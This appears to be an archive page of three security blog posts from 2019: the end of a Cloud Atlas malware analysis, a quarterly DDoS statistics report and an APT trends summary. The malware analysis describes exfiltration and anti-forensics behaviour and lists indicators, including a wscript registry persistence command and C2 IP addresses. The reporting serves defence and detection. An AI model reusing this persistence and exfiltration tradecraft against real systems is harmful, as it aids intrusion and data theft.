Command Description 0x80 (Ascii “P”) It is the first byte of the magic PK. The implant will save the received content as a ZIP archive under %TEMP%\PG.zip. 0x79 (Ascii “O”) It is the first byte of “On resume error”. The implant saves the received content as a VBS script under “%APPDATA%\Microsoft\Word\[A-Za-z]{4}.vbs” and executes it by using Wscript.exe Default If the first byte doesn’t match 0x80 or 0x79, the content is saved as an XML file under “%TEMP%\temp.xml”. After that, the script loads the content of the file, parses the XML to get the PowerShell commands to execute, decodes them from Base64 and invokes IEX.
After executing the commands, the script deletes “%TEMP%\temp.xml” and sends the content of “%TEMP%\pass.txt” to the C2 via an HTTP POST request.

A few modules deployed by PowerShower have been seen in the wild, such as:

  • A PowerShell document stealer module which uses 7zip (present in the received PG.zip) to pack and exfiltrate *.txt, *.pdf, *.xls or *.doc documents smaller than 5MB modified during the last two days;
  • A reconnaissance module which retrieves a list of the active processes, the current user and the current Windows domain. Interestingly, this feature is present in PowerShower but the condition leading to the execution of that feature is never met in the recent versions of PowerShower;
  • A password stealer module which uses the opensource tool LaZagne to retrieve passwords from the infected system.

We haven’t yet seen a VBS module dropped by this implant, but we think that one of the VBS scripts dropped by PowerShower is a dropper of the group’s second stage backdoor documented in our article back in 2014.

And his new friend, VBShower

During its recent campaigns, Cloud Atlas used a new “polymorphic” infection chain relying no more on PowerShower directly after infection, but executing a polymorphic HTA hosted on a remote server, which is used to drop three different files on the local system.

  • A backdoor that we name VBShower which is polymorphic and replaces PowerShower as a validator;
  • A tiny launcher for VBShower ;
  • A file computed by the HTA which contains contextual data such as the current user, domain, computer name and a list of active processes.

This “polymorphic” infection chain allows the attacker to try to prevent IoC-based defence, as each code is unique by victim so it can’t be searched via file hash on the host.

The VBShower backdoor has the same philosophy of the validator version of PowerShower. Its aim is to complicate forensic analysis by trying to delete all the files contained in “%APPDATA%\..\Local\Temporary Internet Files\Content.Word” and “%APPDATA%\..\Local Settings\Temporary Internet Files\Content.Word\”.

Once these files have been deleted and its persistence is achieved in the registry, VBShower sends the context file computed by the HTA to the remote server and tries to get via HTTP a VBS script to execute from the remote server every hour.

At the time of writing, two VBS files have been seen pushed to the target computer by VBShower. The first one is an installer for PowerShower and the second one is an installer for the Cloud Atlas second stage modular backdoor which communicates to a cloud storage service via Webdav.

Final words

Cloud Atlas remains very prolific in Eastern Europe and Central Asia. The actor’s massive spear-phishing campaigns continue to use its simple but effective methods in order to compromise its targets.

Unlike many other intrusion sets, Cloud Atlas hasn’t chosen to use open source implants during its recent campaigns, in order to be less discriminating. More interestingly, this intrusion set hasn’t changed its modular backdoor, even five years after its discovery.

IoCs Some emails used by the attackers
  • infocentre.gov@mail.ru
  • middleeasteye@asia.com
  • simbf2019@mail.ru
  • world_overview@politician.com
  • infocentre.gov@bk.ru
VBShower registry persistence
  • Key : HKCU\Software\Microsoft\Windows\CurrentVersion\Run\[a-f0-9A-F]{8}
  • Value : wscript //B “%APPDATA%\[A-Za-z]{5}.vbs”
VBShower paths
  • %APPDATA%\[A-Za-z]{5}.vbs.dat
  • %APPDATA%\[A-Za-z]{5}.vbs
  • %APPDATA%\[A-Za-z]{5}.mds
VBShower C2s
  • 176.31.59.232
  • 144.217.174.57
2019. augusztus 5.

DDoS attacks in Q2 2019

News overview

The second quarter of 2019 turned out to be richer than the first in terms of high-profile DDoS attacks. True, most of the campaigns that attracted media attention appeared to be politically, rather than commercially, motivated — and that despite the fact that some security experts discern a clear fall in hacktivism in recent years.

Let’s begin with an attack that is technically outside the chronological framework of this report, since it took place on March 5 (but was reported in early May). It was targeted against a computer system regulating the supply of electricity to various districts of Los Angeles and Salt Lake City. Power supply systems in California and Wyoming also experienced problems. This is a relatively rare case of an attack on a power grid in a densely populated area. The attack was large-scale, but relatively primitive. It did not cause any power outages, but there were “disruptions in the normal operation of the systems,” as the US Department of Energy described the incident. As to the purpose and perpetrators of the attack, no information was forthcoming.

In the second half of April, there were also numerous DDoS attacks against Ecuador. As stated by the country’s deputy minister for information and communications, the websites of public institutions experienced 40 million cyber attacks of various kinds, including DDoS. The web pages of the Central Bank, the Ministry of Foreign Affairs, and the Presidential Office suffered the most. The wave of attacks was hacktivist in nature: the attackers were protesting the new government’s decision to strip Julian Assange of political asylum. To cope with the onslaught of digital indignation, Ecuador had to seek help from Israeli experts.

In early June, a powerful DDoS attack hit Telegram. The attack was carried out primarily from Chinese IP addresses, which gave founder Pavel Durov reason to link it to the demonstrations in Hong Kong; in his words, the political opposition there uses Telegram to organize protests, which Beijing takes a very dim view of.

The only headline attack this quarter seemingly driven by commercial considerations targeted video game developer Ubisoft on June 18 — just before the release of its new Operation Phantom Sight expansion for the game Rainbow Six Siege. It caused connection problems for many players, and even provoked calls on Reddit for better DDoS protection.

The largest would-be DDoS attack in Q2 turned out to be a false alarm. In late June, some segments of the Internet experienced operational issues worthy of a major DDoS offensive, but the actual cause lay elsewhere. As it turned out, a small ISP in Pennsylvania had made a configuration error, turning itself into a priority route for some Cloudflare traffic. The provider could not handle the load, and thousands of websites serviced by Cloudflare went down as a result. The WhatsApp and Instagram malfunctions were also attributed to this. It is worth noting that such Internet outages happen quite often; in this case, the scale of the problem and the involvement of Cloudflare led to speculation about a potential DDoS attack.

Meanwhile, law enforcement agencies continue to work on reducing the number of DDoS attacks within their zone of responsibility. For instance, late March saw the arrest of 19-year-old Englishman Liam Reece Watts, accused of two attacks against the websites of Greater Manchester and Cheshire police.

Note also that this quarter confirmed our earlier hypothesis about the link between the decline in the number of DDoS attacks and the rising popularity of cryptocurrency mining : NSFOCUS published a 2018 report that drew a clear correlation between the fluctuations in cryptocurrency prices and the number of DDoS attacks.

Quarter trends

According to Kaspersky DDoS Protection data, this quarter turned out to be rather less eventful than the previous one. As such, the number of attacks foiled by our protection systems fell by 44 p.p. This lull is readily explained by the traditional summer decline in cybercriminal activity. That said, compared with Q2 2018, the total number of attacks actually increased by 18 p.p., which confirms our theory about the recovery of the DDoS market. The growth trend observed since the beginning of 2019 still persists.

It should be noted that the seasonal drop in activity had little impact on attacks more technically complex (both to organize and repel): their share fell by only 4 p.p. against the previous quarter. But compared to the same period last year, the difference is significant and upward — in Q2 2019 “smart” attacks saw 32 p.p. growth. The share of such attacks among all others continues to rise steadily: It increased both against last quarter (by 9 p.p.) and Q2 2018 (by 15 p.p.).

The duration of DDoS sessions also continues to grow steadily in absolute and relative terms (the longest of the defeated attacks, which was also the longest smart attack, lasted for 75 minutes — an impressive figure given that most attacks in this segment get filtered in the early stages). In many ways, the overall growth is due to the increased duration of technically complex attacks, whose average and maximum times grew against both the previous quarter and, even more so, the previous year.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Comparison of the number and duration of standard and smart attacks for Q2 2018, Q1 2019 and Q2 2019 (download)

Therefore, the traditional spring/summer quarter decline can be put down to the drop in the share of non-smart attacks, since it is a time when amateur DDoSers are sitting exams and lying on the beach.

In the world of professional cybercriminals, the picture is different: the indicators for more complex and hence dangerous attacks show steady growth. This is especially evident when compared with the same period last year. The growth relative to Q1 is also clear to see, although less dramatic (as we predicted in our previous quarterly report). The latest figures already point to a stable trend. It will be very interesting to observe how the situation unfolds over the next trimester: will we see further growth, or will the market stabilize at the current level?

Statistics Methodology

Kaspersky Lab has a long history of combating cyber threats, including DDoS attacks of all types and complexity. Company experts monitor botnets using the Kaspersky DDoS Intelligence system.

A part of Kaspersky DDoS Protection, the DDoS Intelligence system intercepts and analyzes commands received by bots from C&C servers. The system is proactive, not reactive, meaning that it does not wait for a user device to get infected or a command to be executed.

This report contains DDoS Intelligence statistics for Q2 2019.

In the context of this report, the incident is counted as a single DDoS-attack only if the interval between botnet activity periods does not exceed 24 hours. For example, if the same web resource was attacked by the same botnet with an interval of 24 hours or more, then this is considered as two attacks. Bot requests originating from different botnets but directed at one resource also count as separate attacks.

The geographical locations of DDoS-attack victims and C&C servers used to send commands are determined by their respective IP addresses. The number of unique targets of DDoS attacks in this report is counted by the number of unique IP addresses in the quarterly statistics.

DDoS Intelligence statistics are limited to botnets detected and analyzed by Kaspersky Lab. Note that botnets are just one of the tools used for DDoS attacks, and that this section does not cover every single DDoS attack that occurred during the review period.

Quarter summary
  • In this quarter, China once again was the most targeted region by number of attacks (63.80%), followed by the US (17.57%) and Hong Kong (4.61%).
  • There was little movement in the Top 3, but lower down there again appeared countries not usually associated with high levels of DDoS activity — this time it was the Netherlands (4th with 1.54%) and Taiwan (7th with 1.15%).
  • The Top 10 by number of unique targets generally coincides with the ranking by number of attacks: China (55.17%), US (22.22%), and Hong Kong (4.53%) make up the podium here again. They are joined by Taiwan (1.61%) and Ireland (1%).
  • This quarter’s choppiest month was April, which included peak attack time; the quietest was May immediately after.
  • Statistically, the biggest share of attacks came on Monday (17.55%), while Sunday was the calmest day (10.45%).
  • The longest attack (509 hours) in Q2 significantly outperformed the previous quarter’s leader, and set an all-time record since these reports began. Despite that, the overall proportion of prolonged attacks declined this quarter.
  • The largest share of junk traffic in Q2 still consisted of SYN flooding (82.43%), followed by UDP (10.94%). However, HTTP and TCP traffic swapped places: the latter nudged ahead on 3.26%, while the former scored only 2.77%.
  • The shares of Windows- and Linux-based botnets barely changed against the previous quarter.
  • The geographical rating list by number of botnet C&C servers is dominated by the US (44.14%), followed by the Netherlands (12.16%) and the UK (9.46%). Interestingly, this quarter’s Top 10 had no place for Russia.
Attack geography

The Top 3 countries by number of attacks against targets in a particular country remained almost unchanged this quarter: China is still in first place, although its share dropped by about 4 p.p. to 63.80%. In second place is the US with practically the same share as before (17.57%), while third place goes to Hong Kong (4.61%), whose contribution to the total number of cyber attacks also changed very little.

The trend of past quarters continues, with the Top 10 again hosting some unexpected guests. This time, they were the Netherlands, ranked fourth with 1.54%, and Taiwan in seventh position with a 1.15% slice. But whereas the Netherlands is not a complete stranger to the Top 10, having entered in 2016 and flirted with it on other occasions, the result represents significant growth in Taiwan’s indicators.

The Top 10 said goodbye to France and Saudi Arabia, and Canada dropped from fourth to eighth, although in numerical terms its share actually rose to 0.93%. The leaderboard was propped up by Vietnam (0.68%), while the UK rose one position to sixth (1.20%). Singapore remains in fifth place, although its share also climbed (to 1.25%).

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Distribution of DDoS attacks by country, Q1 and Q2 2019 (download)

The distribution of the number of unique targets corresponds more or less to the distribution of the number of attacks. The first four places coincide: China posted 55.17% (down, again by about 4 p.p.), the US 22.22% (up by about 1 p.p.), Hong Kong 4.53% (down by a slender 0.2 p.p.), and the Netherlands 2.34% (a significant change, since the country was nowhere to be seen in last quarter’s Top 10).

As for the remaining Top 10 permutations, besides the Netherlands, Taiwan took sixth place (1.61%) and Ireland came ninth with a share of 1%. Meanwhile, Poland, Germany, and Saudi Arabia departed the Top 10, while France (0.9%) dropped from seventh place to last, despite losing only 0.1 p.p.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Distribution of unique DDoS-attack targets by country, Q1 and Q2 2019 (download)

Dynamics of the number of DDoS attacks

The second quarter, like the first, was relatively calm, with no sudden spikes. The most activity was observed at the beginning of the quarter, and peak day was April 8 (538 attacks). This was followed by a gradual decline throughout the following month, with calmest day being May 9 (79 attacks). In early June, DDoS attack organizers perked up somewhat, but the end of the month saw another slump.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Dynamics of the number of DDoS attacks in Q2 2019 (download)

The most dangerous weekday in Q2 from a DDoS perspective was Monday (17.55%), snatching the laurel wreath from Saturday. This bucked the trend of recent quarters in which the greatest activity was observed in the middle and at the end of the week. Sunday remains the quietest day (10.45%), and there is also relative calm on Fridays (13.11%). All other days of the week, the attacks are spread more or less evenly.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Distribution of DDoS attacks by day of the week, Q1 and Q2 2019 (download)

Duration and types of DDoS attacks

The longest attack in Q2 2019 lasted 509 hours (a fraction over 21 days), and was directed against Chinese telecom operator China Unicom. It is the longest attack ever recorded in this series of quarterly reports. Last quarter’s longest attack was approximately 1.7 times shorter (289 hours).

Despite the new record, the overall share of long-duration attacks this quarter declined significantly. Only attacks lasting from 100 to 139 hours (0.11%) remained at the same level, while the share of attacks of 140 hours or more almost halved (from 0.21 to 0.13%). Most significantly of all, the share of medium-duration attacks — from 50 to 99 hours — was slashed by almost two-thirds, accounting for 0.54% of all attacks against last quarter’s figure of 1.51%. The proportion of 5–19 hour attacks fell only slightly.

Accordingly, the share of attacks of no more than four hours increased: from 78.66% to 82.69%.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Distribution of DDoS attacks by duration (hours), Q1 and Q2 2019 (download)

In terms of DDoS-attack types, SYN flooding is still the most popular, although its share dipped by roughly 1.5 p.p. against the previous quarter to 82.43%. In second place is UDP flooding, whose figure, on the contrary, climbed by 2 p.p. to 10.94%. TCP requests rose to third place with a share of 3.26%, while the percentage of HTTP traffic, conversely, fell to 2.77%. Last place still belongs to ICMP flooding, with a share of 0.59%.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Distribution of DDoS attacks by type, Q2 2019 (download)

The distribution of botnet attacks by family remains roughly the same as in the previous quarter, with assaults against Linux systems still ahead by a wide margin. Although Xor activity faded once more, this decline was more than offset by the rise in the number of Mirai-based attacks.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Ratio of Windows/Linux botnet attacks, Q1 and Q2 2019 (download)

Botnet distribution geography

In terms of geographical distribution of botnet C&C servers, the US (44.14%) remains on top. It is joined in the Top 10 by the Netherlands (12.16%) and the UK (9.46%). China only managed fifth position (4.95%), while South Korea’s share (1.80%) was only good enough for second-to-last place. In addition, this quarter’s Top 10 welcomed Greece (1.35%), but pushed out Romania and, far more surprisingly, Russia.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Distribution of botnet C&C servers by country, Q2 2019 (download)

Conclusion

As in several past quarters, the Top 10 geographical distributions continue to amaze. This may be not only because DDoS masterminds are looking for new places where the arm of the law is not so long and electricity prices are not too high, but because the threshold for breaking into the Top 10 is quite low. As a rule, the Top 3 leaders scoop up most of the attacks, so the shares of all other regions remain relatively small. That being the case, even small fluctuations can lead to a country rocketing up or down the rating lists.

True, this cannot completely account for the vanishing act of traditional leaders like South Korea and Russia (the latter’s absence in the Top 10 by number of C&C botnets is particularly striking). If the rearrangement is genuinely linked to a tightening of the legal screws, we should expect the rating lists to feature countries with poorly developed cybercrime laws.

The lack of DDoS spikes this quarter is clearly due to seasonal fluctuations; the summer months are traditionally more serene, if only relatively speaking.

2019. augusztus 1.

APT trends report Q2 2019

For two years, the Global Research and Analysis Team (GReAT) at Kaspersky has been publishing quarterly summaries of advanced persistent threat (APT) activity. The summaries are based on our threat intelligence research and provide a representative snapshot of what we have published and discussed in greater detail in our private APT reports. They aim to highlight the significant events and findings that we feel people should be aware of.

This is our latest installment, focusing on activities that we observed during Q2 2019.

Readers who would like to learn more about our intelligence reports or request more information on a specific report are encouraged to contact ‘intelreports@kaspersky.com’.

The most remarkable findings

In April, we published our report on TajMahal, a previously unknown APT framework that has been active for the last five years. This is a highly sophisticated spyware framework that includes backdoors, loaders, orchestrators, C2 communicators, audio recorders, keyloggers, screen and webcam grabbers, documents, and cryptography key stealers; and even its own file indexer for the victim’s computer. We discovered up to 80 malicious modules stored in its encrypted Virtual File System – one of the highest numbers of plugins we have ever seen in an APT toolset. The malware features its own indexer, emergency C2s, the ability to steal specific files from external drives when they become available again, and much more. There are two different packages, self-named ‘Tokyo’ and ‘Yokohama’ and the targeted computers we found include both packages. We think the attackers used Tokyo as the first stage infection, deploying the fully functional Yokohama package on interesting victims, and then leaving Tokyo in place for backup purposes. So far, our telemetry has revealed just a single victim, a diplomatic body from a country in Central Asia. This begs the question, why go to all that trouble for just one victim? We think there may be other victims that we haven’t found yet. This theory is supported by the fact that we couldn’t see how one of the files in the VFS was used by the malware, opening the door to the possibility of additional versions of the malware that have yet to be detected.

On May 14, FT reported that a zero-day vulnerability in WhatsApp had been exploited, allowing attackers to eavesdrop on users, read their encrypted chats, turn on the microphone and camera and install spyware that allows even further surveillance, such as browsing through a victim’s photos and videos, accessing their contact list and more. In order to exploit the vulnerability, the attacker simply needs to call the victim via WhatsApp. This specially crafted call can trigger a buffer overflow in WhatsApp, allowing an attacker to take control of the application and execute arbitrary code in it. Apparently, the attackers used this method to not only snoop on people’s chats and calls but also to exploit previously unknown vulnerabilities in the operating system, which allowed them to install applications on the device. The vulnerability affects WhatsApp for Android prior to 2.19.134, WhatsApp Business for Android prior to 2.19.44, WhatsApp for iOS prior to 2.19.51, WhatsApp Business for iOS prior to 2.19.51, WhatsApp for Windows Phone prior to 2.18.348 and WhatsApp for Tizen prior to 2.18.15. WhatsApp released patches for the vulnerability on May 13. Some have suggested that the spyware may be Pegasus, developed by Israeli company NSO.

Russian-speaking activity

We continue to track the activities of Russian-speaking APT groups. These groups usually show a particular interest in political activities, but apart from a couple of interesting exceptions we failed to detect any remarkable examples during the last quarter.

We did find a potential connection between Hades and a leak at the RANA institute. Hades is possibly connected to the Sofacy threat actor, most notable for being behind Olympic Destroyer, as well as ExPetr and several disinformation campaigns such as the Macron leaks. Earlier this year, a website named Hidden Reality published leaks allegedly related to an Iranian entity named the RANA institute. This was the third leak in two months that disclosed details of alleged Iranian threat actors and groups. Close analysis of the materials, the infrastructure and the dedicated website used by those behind the leak led us to believe that these leaks might be connected to Hades. This might be part of a disinformation campaign in which Hades helps to raise doubts about the quality of the information leaked in other cases from earlier this year.

Zebrocy continued adding new tools to its arsenal using various kinds of programming languages. We found Zebrocy deploying a compiled Python script, which we call PythocyDbg, within a Southeast Asian foreign affairs organization: this module primarily provides for the stealthy collection of network proxy and communications debug capabilities. In early 2019, Zebrocy shifted its development efforts with the use of Nimrod/Nim, a programming language with syntax resembling both Pascal and Python that can be compiled down to JavaScript or C targets. Both the Nim downloaders that the group mainly uses for spear-phishing, and other Nim backdoor code, are currently being produced by Zebrocy and delivered alongside updated compiled AutoIT scripts, Go, and Delphi modules. The targets of this new Nimcy downloader and backdoor set includes diplomats, defense officials and ministry of foreign affairs staff, from whom they want to steal login credentials, keystrokes, communications, and various files. The group appears to have turned its attention towards the March events involving Pakistan and India, and unrelated diplomatic and military officials, while maintaining ongoing access to local and remote networks belonging to Central Asian governments.

We also recently observed some interesting new artifacts that we relate to Turla with varying degrees of confidence.

In April 2019, we observed a new COMpfun-related targeted campaign using new malware. The Kaspersky Attribution Engine shows strong code similarities between the new family and the old COMpfun. Moreover, the original COMpfun is used as a downloader in one of the spreading mechanisms. We called the newly identified modules Reductor after a .pdb path left in some samples. We believe the malware was developed by the same COMPfun authors that, internally, we tentatively associated with the Turla APT, based on victimology. Besides the typical RAT functions (upload, download, execute files), Reductor’s authors put a lot of effort into manipulating installed digital root certificates and marking outbound TLS traffic with unique host-related identifiers. The malware adds embedded root certificates to the target host and allows operators to add additional ones remotely through a named pipe. The solution used by Reductor’s developers to mark TLS traffic is the most ingenious part. The authors don’t touch the network packets at all; instead they analyze Firefox source and Chrome binary code to patch the corresponding system pseudo-random number generation (PRNG) functions in the process’s memory. Browsers use PRNG to generate the “client random” sequence during the very beginning of the TLS handshake. Reductor adds the victims’ unique encrypted hardware- and software-based identifiers to this “client random” field.

Additionally we identified a new backdoor that we attribute with medium confidence to Turla. The backdoor, named Tunnus, is .NET-based malware with the ability to run commands or perform file actions on an infected system and send the results to its C2. So far, the C2 infrastructure has been built using compromised sites with vulnerable WordPress installations. According to our telemetry, Tunnus’s activity started last March and was still active at the time of writing.

ESET has also reported PowerShell scripts being used by Turla to provide direct, in-memory loading and execution of malware. This is not the first time this threat actor has used PowerShell in this way, but the group has improved these scripts and is now using them to load a wide range of custom malware from its traditional arsenal. The payloads delivered via the PowerShell scripts – the RPC backdoor and PowerStallion – are highly customized.

Symantec has also been tracking targeted attacks in a series of campaigns against governments and international organizations across the globe over the past 18 months. The attacks have featured a rapidly evolving toolset and, in one notable instance, the apparent hijacking of infrastructure belonging to OilRig. They have uncovered evidence that the Waterbug APT group (aka Turla, Snake, Uroburos, Venomous Bear and KRYPTON) has conducted a hostile takeover of an attack platform belonging to OilRig (aka Crambus). Researchers at Symantec suspect that Turla used the hijacked network to attack a Middle Eastern government that OilRig had already penetrated. This is not the first time that we have seen this type of activity. Clearly, operations of this kind make the job of attribution more difficult.

The international community continues to focus on the activity of Russian-speaking threat actors. Over the last 18 months, the UK has shared information on attacks attributed to Russian hackers with 16 NATO allies, including attacks on critical national infrastructure and attempts to compromise central government networks. In his former capacity as UK foreign secretary, Jeremy Hunt, recently urged nations to band together to create a deterrent for state-sponsored hackers. As part of this push, the UK and its intelligence partners have been slowly moving towards a ‘name and shame’ approach when dealing with cyberattacks. The use of the ‘court of public opinion’ in response to cyberattacks is a trend that we highlighted in our predictions for 2019. To help this new strategy the EU recently passed new laws that will make it possible for EU member states to impose economic sanctions against foreign hackers.

Researchers at the Microstep Intelligence Bureau have published a report on targeted attacks on the Ukrainian government that they attribute to the Gamaredon threat actor. Recently, the group launched attacks on a number of state organizations in Ukraine using Pterodo, malware used exclusively by this group. Since February, the attackers have deployed a large number of dynamic domain names and newly registered domain names believed to be used to launch targeted attacks against elections in Ukraine.

Chinese-speaking activity

We found an active campaign by a Chinese APT group we call SixLittleMonkeys that uses a new version of the Microcin Trojan and a RAT that we call HawkEye as a last stager. The campaign mainly targets government bodies in Central Asia. For persistence, the operators use .DLL search order hijacking. This consists of using a custom decryptor with a system library name (e.g., version.dll or api-ms-win-core-fibers-l1-1-1.dll) in directories, along with the legitimate applications that load these libraries into memory. Among other legitimate applications, the threat actor uses the Google updater, GoogleCrashHandler.exe, for .DLL hijacking. Custom encryptors protect the next stagers from detection on disk and from automated analysis, using the same encryption keys in different samples. For secure TLS communication with its C2, the malware uses the Secure Channel (Schannel) Windows security package.

ESET discovered that the attackers behind the Plead malware have been distributing it using compromised routers and man-in-the-middle (MITM) attacks in April. Researchers have detected this activity in Taiwan, where the Plead malware has been most actively deployed. Trend Micro has previously reported the use of this malware in targeted attacks by the BlackTech group, primarily focused on cyber-espionage in Asia. ESET telemetry has revealed multiple attempts to deploy it.

LuckyMouse activity detected by Palo Alto involved the attackers installing web shells on SharePoint servers to compromise government organizations in the Middle East, probably exploiting CVE-2019-0604, a remote code execution vulnerability used to compromise the server and eventually install a web shell. The actors uploaded a variety of tools that they used to perform additional activities on the compromised network, such as dumping credentials, as well as locating and pivoting to additional systems on the network. Of particular note is the group’s use of tools to identify systems vulnerable to CVE-2017-0144, the vulnerability exploited by EternalBlue and used in the 2017 WannaCry attacks. This activity appears to be related to campaigns exploiting CVE-2019-0604 mentioned in recent security alerts from the Saudi Arabian National Cyber Security Center and the Canadian Center for Cyber Security.

Last year, a number of Chinese hackers allegedly linked to the Chinese government were indicted in the US. In May, the US Department of Justice indicted a Chinese national for a series of computer intrusions, including the 2015 data breach of health insurance company Anthem which affected more than 78 million people.

Middle East

The last three months have been very interesting for this region, especially considering the multiple leaks of alleged Iranian activity that were published within just a few weeks of each other. Even more interesting is the possibility that one of the leaks may have been part of a disinformation campaign carried out with the help of the Sofacy/Hades actor.

In March, someone going by the handle Dookhtegan or Lab_dookhtegan started posting messages on Twitter using the hashtag #apt34. Several files were shared via Telegram that supposedly belonged to the OilRig threat actor. They included logins and passwords of several alleged hacking victims, tools, infrastructure details potentially related to different intrusions, the résumés of the alleged attackers and a list of web shells – apparently relating to the period 2014-18.

The targeting and TTPs are consistent with this threat actor, but it was impossible to confirm the origins of the tools included in the dump. Assuming that the data in the dump is accurate, it also shows the global reach of the OilRig group, which has generally been thought to operate primarily in the Middle East.

On April 22, an entity going by the alias Bl4ck_B0X created a Telegram channel named GreenLeakers. The purpose of the channel, as stated by its creator, was to publish information about the members of the MuddyWater APT group, “along with information about their mother and spouse and etc.”, for free. In addition to this free information, the Bl4ck_B0X actor(s) also hinted that “highly confidential” information related to MuddyWater would be put up for sale.

On April 27, three screenshots were posted in the GreenLeakers Telegram channel, containing alleged screenshots from a MuddyWater C2 server. On May 1, the channel was closed to the public and its status changed to private. This was before Bl4ck_B0X had the chance to publish the promised information on the MuddyWater group. The reason for the closure is still unclear.

Finally, a website named Hidden Reality published leaks allegedly related to an entity named the Iranian RANA institute. It was the third leak in two months disclosing details of alleged Iranian threat actors and groups.

Interestingly, this leak differed from the others by employing a website that allows anyone to browse the leaked documents. It also relies on Telegram and Twitter profiles to post messages related to Iranian CNO capabilities. The Hidden Reality website contains internal documents, chat messages and other data related to the RANA institute’s CNO (Computer Network Operations) capabilities, as well as information about victims. Previous leaks were focused more on tools, source code and individual actor profiles.

Close analysis of the materials, the infrastructure and the dedicated website used by the leakers, provided clues that led us to believe Sofacy/Hades may be connected to these leaks.

There was also other Muddywater activity unrelated to the leak, as well as discoveries linked to previous activity by the group, such as ClearSky’s discovery of two domains hacked by MuddyWater at the end of 2018 to host the code of its POWERSTATS malware.

In April, Cisco Talos published its analysis of the BlackWater campaign, related to MuddyWater activity. The campaign shows how the attackers added three distinct steps to their operations, allowing them to bypass certain security controls to evade detection: an obfuscated VBA script to establish persistence as a registry key, a PowerShell stager and FruityC2 agent script, and an open source framework on GitHub to further enumerate the host machine. This could allow the attackers to monitor web logs and determine whether someone outside the campaign has made a request to their server in an attempt to investigate the activity. Once the enumeration commands run, the agent communicates with a different C2 and sends back data in the URL field. Trend Micro also reported MuddyWater’s use of a new multi-stage PowerShell-based backdoor called POWERSTATS v3.

We published a private report about four Android malware families and their use of false flag techniques, among other things. One of the campaigns sent spear-phishing emails to a university in Jordan and the Turkish government, using compromised legitimate accounts to trick victims into installing malware.

Regarding other groups, we discovered new activity related to ZooPark, a cyber-espionage threat actor that has focused mainly on stealing data from Android devices. Our new findings include new malicious samples and additional infrastructure that has been deployed since 2016. This also led to us discovering Windows malware implants deployed by the same threat actor. The additional indicators we found shed some light on the targets of past campaigns, including Iranian Kurds – mainly political dissidents and activists.

Recorded Future published an analysis of the infrastructure built by APT33 (aka Elfin) to target Saudi organizations. Following the exposure of a wide range of their infrastructure and operations by Symantec in March, researchers at Recorded Future discovered that APT33, or closely aligned actors, reacted by either parking or reassigning some of their domain infrastructure. The fact that this activity was executed just a day or so after the report went live suggests the Iranian threat actors are acutely aware of the media coverage of their activities and are resourceful enough to be able to react in a quick manner. Since then, the attackers have continued to use a large swath of operational infrastructure, well in excess of 1,200 domains, with many observed communicating with 19 different commodity RAT implants. An interesting development appears to be their increased preference for njRAT, with over half of the observed suspected APT33 infrastructure being linked to njRAT deployment.

